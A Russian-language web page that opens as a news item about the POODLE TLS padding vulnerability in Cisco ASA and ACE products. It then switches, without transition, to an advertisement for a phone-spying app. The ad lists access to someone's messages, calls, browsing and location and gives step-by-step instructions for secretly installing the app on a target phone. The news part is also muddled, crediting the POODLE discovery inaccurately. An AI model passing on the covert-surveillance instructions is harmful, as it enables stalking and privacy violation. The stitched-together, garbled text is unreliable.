Найдены TLS уязвимости в программах Cisco

017Уязвимость под названием POODLE была обнаружена специалистами самой компании Cisco. Заявлено, что она присутствует в двух программных продуктах от этого разработчика. Это Cisco ASA (Adaptive Security Appliance) и дополнительный опциональный модуль Cisco Application Control Engine (ACESM). Названная брешь подвержена вероятным атакам по TLS нового типа. На данный момент активно ведётся разработка заплатки, поэтому дыра в безопасности может закрыться в самое ближайшее время.

Уязвимость возникла при недостаточно корректной реализации программного паддинга блочного шифра, использовавшегося в отдельном протоколе TLSv1 при запуске и применении режима сцепления отдельно взятых блоков шифротекста (название этой процедуры в рамках терминов Cisco — Cipher Block Chaining). Если злоумышленник пытался эксплуатировать такую брешь, гипотетически он мог получить доступ к расшифровке зашифрованных данных, которые являются скрытыми для неавторизованных пользователей.

Также специалисты компании добавили, что в серии Cisco ACE 4700 подобных программных проколов найдено не было, уязвимость POODLE там работать не будет. В то же время отмечается, что ряд сканеров могут произвести идентификацию данного ПО как имеющего схожие проблемы.

О дате выпуска обновлений Cisco пока не сообщает, но произойдёт это в ближайшее время. Сотрудники компании напоминают, что шифрование данных по каналам связи обеспечивает максимально возможную сохранность информации. Поэтому использование уязвимости для её расшифровки злоумышленниками маловероятна, но не исключена.

Сам по себе дешифратор требует значительных программных ресурсов и времени. Отчёт о бреши носит информационный характер, и не должен восприниматься в качестве критической ошибки их ПО. Уязвимость в POODLE обнаружена в октябре прошлого года Адамом Лэнгли из Google. Этот специалист пояснил, что данная брешь похожа на модифицированную версию SSL 3.0, а паддинг TLS выполняется по полной аналогии. Поэтому исправление ошибки – вопрос времени, методики дополнительной защиты данных известны уже давно.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.